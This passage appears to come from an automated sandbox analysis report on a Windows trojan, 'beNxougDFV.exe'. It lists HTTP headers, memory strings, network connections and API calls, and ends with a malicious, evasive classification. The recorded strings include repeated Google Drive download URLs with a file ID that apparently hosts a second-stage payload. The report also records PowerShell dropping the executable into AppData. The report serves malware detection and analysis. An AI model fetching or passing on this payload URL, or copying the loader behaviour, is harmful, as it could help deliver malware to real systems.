    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:35 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-K_qU7H1h0y8laEanXZv6wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4GWqdxQdMKEwD_13wPbSvXh3p_XI2PrwtnNmRknO_EtAUbhXcriud0FoZ6G-5YjWtBBUiEzAuK5gServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:41 GMTContent-Security-Policy: script-src 'nonce-g0yU3za_5L0SxthWSXDTjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5a9glzorMvCoxJ1eOytCN6c4Pm9J1eGB44HAU8OQPTsh0hZaicFUBPkmhIfAipwZ9gGPrbDkRbYwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:47 GMTContent-Security-Policy: script-src 'nonce-2x3hlxUn2hfgTaPr_UuFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7C-c8H1h2722goJP3tpQ84Ob2Ihon4k1h-1gncRhYz9Ux-A9nVZxj-r2o5LzKC9-ieiHEU64ARlwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: beNxougDFV.exe, beNxougDFV.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: beNxougDFV.exe, beNxougDFV.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=d
    Source: msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/#pMR=
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download6Q
    Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/cq
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
    Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=do
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
    Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW$
    Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW0&
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW3.5
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWECGCfUV-uNnbJgW6y
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWfceS
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWfx
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWroso
    Source: msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWst
    Source: msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWt
    Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgWvy
    Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW~
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
    Source: msiexec.exe, 00000007.00000003.2350547385.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2577354844.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2294517511.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)rLS
    Source: msiexec.exe, 00000007.00000003.2435501502.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/c
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloade2
    Source: msiexec.exe, 00000007.00000003.2493563781.000000000985C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadf
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadj
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadt
    Source: msiexec.exe, 00000007.00000002.2601099669.00000000097EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloadx
    Source: msiexec.exe, 00000007.00000003.2435471529.0000000009860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=downloady
    Source: msiexec.exe, 00000007.00000003.2493563781.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/s
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: msiexec.exe, 00000007.00000003.2378544297.0000000009860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googl
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000982F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2435501502.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2493563781.000000000983E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2520985349.000000000983E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;reporm
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
    Source: msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: msiexec.exe, 00000007.00000003.2521068299.0000000009860000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2323066299.000000000985F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.0000000009861000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2601099669.000000000984A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2548831592.000000000985E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2265787447.0000000009861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49908 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49923 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49930 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49937 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49973 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49977 version: TLS 1.2
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_00405194 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405194

    System Summary

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exeJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004049D30_2_004049D3
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004065BB0_2_004065BB
    Source: beNxougDFV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/14@2/2
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004031BB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031BB
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_00404460 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404460
